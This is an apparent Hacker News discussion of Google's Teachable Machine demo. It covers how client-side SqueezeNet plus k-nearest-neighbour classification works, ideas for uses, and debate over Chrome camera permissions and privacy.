We do not send any webcam / audio data back to a server, all of the computation is totally client side. The storage API requests are just downloading weights of a pretrained model.
We're thinking about releasing a blog post explaining the technical details of this project, would people be interested?
We're using SqueezeNet (https://github.com/DeepScale/SqueezeNet), which is similar to Inception (trained on the same ImageNet dataset) but is much smaller - 5MB instead of inception's 100MB - and inference is much much quicker.
The application takes webcam frames and infers through SqueezeNet, producing a 1000D logits vector for each frame. These can be thought of as unnormalized probabilities for each of ImageNet's 1000 classes.
During the collection phase, we collect these vectors for each class in browser memory, and during inference we pass the frame through SqueezeNet and do k-nearest neighbors to find the class with the most similar logits vector. KNN is quick because we vectorize it as one large matrix multiplication.
I'm curious why you've used a different classification algorithm on top of a neural network. I would expect that a neural network on top of a pretrained network could give similar results, with the benefit of simpler code. Is performance the reason?
Training a neural network on top would require a "proper" training phase, and finding the right hyperparameters that work everywhere turned out to be tricky. Actually, this is what we did originally, in the blog post we'll try to show demos of each of the approaches and explain why they don't work.
KNN also makes training "instant", and the code much much simpler.
By the way, I think your software could become very popular on the Raspberry Pi, because it would be very cheap and fun to use it for all sorts of applications (e.g. home automation).
There's something fantastically entertaining about this. It's stupidly simple (from the outside) but interacting with the computer in such a different way is weirdly fun.
It's like when you turn on a camera and people can see themselves on a TV. A lot of people can't help but make faces at it.
Why does it not work in Edge? Please keep the web open, do not make stuff that does not work in a modern browser. Also always give an option to try it anyway.
Pretty neat! Good overview without overwhelming right off the bat. Would be cool if they showed off common pitfalls like over fitting, or even segued into general statistics!
How long before I can teach my computer gestures that are mapped to real computer functions? For example, scroll up/down, switch apps, save document, cut/copy/paste, etc.
One could probably map each gesture to a regular USB device that acts as a second keyboard and mouse? The hard part is identifying enough unique gestures?
I think that’s infrared but the same idea. That never quite worked. Also, Leap didn’t continue to refine their hardware for consumers. They have next generation hardware that’s going directly into VR headsets, but you can’t buy it.
Seems to me that you can buy the SDK[0] (which is not much more than a Controller and a bracket to hold in against your VR headset of choice), so at least they've made some progress since 2014.
[0]: http://store-eur.leapmotion.com/products/universal-vr-develo...
Ah sorry. So there are three coloured buttons. When you hold one, the site takes a series of photos from your webcam, and assign them to that "class". Then it'll train and start classifying your video input live.
It's a pretty neat way of creating a reasonable training set of 3 classes.
It's working great because they're using a state of the art model (SqueezeNet https://github.com/DeepScale/SqueezeNet) and also the samples / experiments you do are often only on yourself, in the same lighting, same clothes, etc. So it gives a nice idealized playground environment that mostly eliminates annoying details like this.
there are 3 default classes, so you train according to each class(e.g. hand waving, sitting still, etc) you take examples of each(using your camera). you map the input data from your camera to some output data(e.g. if i used the green button to take photos of me waving), display a GIF of a cat that's waving. instead of a GIF you can use sound too
The value-add for this demo is amazing, it's going to be many people's first approachable experience of ml, or things just like this will be. I expect a lot more of this stuff to appear in UI/UX. It's fun, intuitive, and a game changer away from dumb screens to fully interactive machines with their own knowledge graph.
To use azure which places a too high bar on students. I mean I've tried to argue for graduated restrictions so basically students with .edu emails should be able to do some things without entering a credit card number but the fact that it is not possible suggests this isn't a priority for azure.
Google says this finds on your browser so there's little infrastructure cost for this demo, right?
Can you clarify on what you did with it? I'd love to start dabbling in solving problems with ML, but am a bit intimidated by getting started. Is it fairly easy for a novice to do the things you did?
Does anyone know what this uses under the hood? I loved the demo, but I would like a similarly easy way to get started locally with Python, for example.
Is there an ML library that can easily start capturing images from the webcam so you can play around with training a model?
Your unbridled optimism even in the face of reality has inspired me to give this a shot, thank you! It seems to be based on Weka, so it should be good.
On a first run, I don't really see how to record images from the webcam, it just says "waiting for samples". I'll play around some more and hopefully figure it out, thanks again.
EDIT: Ah, there's a detailed walkthrough which seems to work well!
be aware, at least in Chrome, once you give teachablemachine.withgoogle.com permission to use you camera, unless you revoke that permission is has permission to use your camera without further permission including from iframes. In other words every ad from and analytics from Google could start injecting camera access.
I wish chrome would give the option to only give permission "this time" and I wish it didn't allow camera access from cross domain iframes.
Are you serious? Do you realize that Chrome is also written by Google and they could theoretically already run arbitrary code on your computer? The potential reputation damage and legal risk for Google would be way too high pull off something like that.
If this happened, the Google Chrome tab would show a camera. Many webcams have adjacent LEDs that identify that they are activated.
Google could theoretically release compromised versions of Google Chrome and only use the permission on devices where webcam LEDs are unlikely (e.g. smartphones), but this is going deep into tin-foil-hat territory.
that's not helpful. the pictures would already be taken and uploaded to servers without my permission reguardless of whether or not I wanted my picture taken or what's visible (contracts, trade secrets, people in various states of undress) .
also this isn't about Google spying. it's about Chrome's bad camera permission model. any company can abuse it
Google ads and analytics inject JavaScript which means they can insert iframes for any domain they want. If they injected <iframe src="https:// teachablemachine.withgoogle.com/spyonuserwithcamera" /> they'd be able to use your camera from the ad or analytics without asking for permission again.
Of course I'm not suggesting Google would actually do that but some other company might make seeamazingcamerameme.com to get users to turn on there camera for that domain and then after that make iframes for seeamazingcamerameme.com/spy
That's one of these arguments that may attack the parent in isolation, but makes absolutely no sense in the context of the thread they were replying to.
Because if you assume an attacker to have control over DNS, the security model of giving permission on a per-domain basis is broken anyway, and the initial concern with granting google this access is already subsumed in your general paranoia.
It works on mobile, it's just slow. Every time we read and write from memory we have to pack and unpack 32 bit floats as 4 bytes without bit shifting operators >.>
Hmm. I wonder if one could train this with dick pics and embed into popular messenger apps client-side... "this picture was classified as a penis", to counter morons sending their dick as first message.
Claims like these make privacy-focused efforts less valuable, and I wish people wouldn't make them.
What value is there in taking care to store biometric data only locally, in a separate chip inaccessible even to the OS, if people will simply claim it's equivalent to keeping a remote database of millions of faces?
People will be much less likely to make those claims if you clearly state where the data is being stored. This article + their project page doesn't mention anything about privacy.
People need to ask the question before making assumptions. In the case of Apple, they said it directly in the presentation of FaceID as well as TouchID IIRC. Yet people made these claims anyway. For this project, they also state it clearly on the page:
> Are my images being stored on Google servers?
> No. All the training is happening locally on your device.
Where is it clearly stating that? I couldn't find anything in the linked article + the github repo + teachablemachine.withgoogle.com
But I do agree people need to ask the question before making assumptions. Sadly, the two popular mindsets is either to not think about privacy at all, or believe that everything is infringing on your privacy.
Ah, I didn't get that far due to it requesting the webcam. I'd prefer that they state it before the request, but an FAQ at the start of the project is good enough.
Facebook beat them to it... that's the whole reason for tagged images imo. Then they can relate identities with each other and with exif gps data to track their movements over time.
HN discussions tend to devolve into rants about privacy. There are a lot of repeated discussions that occur here. They overwhelm the discussion about the actual technology
Also, my own personal privacy is less secure if it's a relative inconvenience for employers. If everyone but me gives up their privacy then there's more pressure on me to follow suit.
The argument even doubles back on itself. If these comments aren't interesting to you... don't read them. Embrace tree-style collapsible comments.
You can learn lots of interesting things by invading people's privacy.
I responded to the argument you linked. You're avoiding a more interesting discussion on the topic. Push the [-] button and move on. Your comment is blatantly hypocritical:
"Every time X is updated people complain about X; those people ignore the details of the update."
"Every time people complain about X other people complain about them complaining about X; those people ignore the details of the complaint."
That's because the privacy implication of the technology should be part of the discussions on the technology... technology is not neutral, the way its used and the privacy implications are significant.
I am pretty sure that Apple does not save your image data in any database. Apple is really trying to differentiate itself on privacy.
Also, I don't think that this sends any data to Google, since it trains the neural net in the browser. You could even verify this yourself by looking at the source code.
We do not send any webcam / audio data back to a server, all of the computation is totally client side. The storage API requests are just downloading weights of a pretrained model.
We're thinking about releasing a blog post explaining the technical details of this project, would people be interested?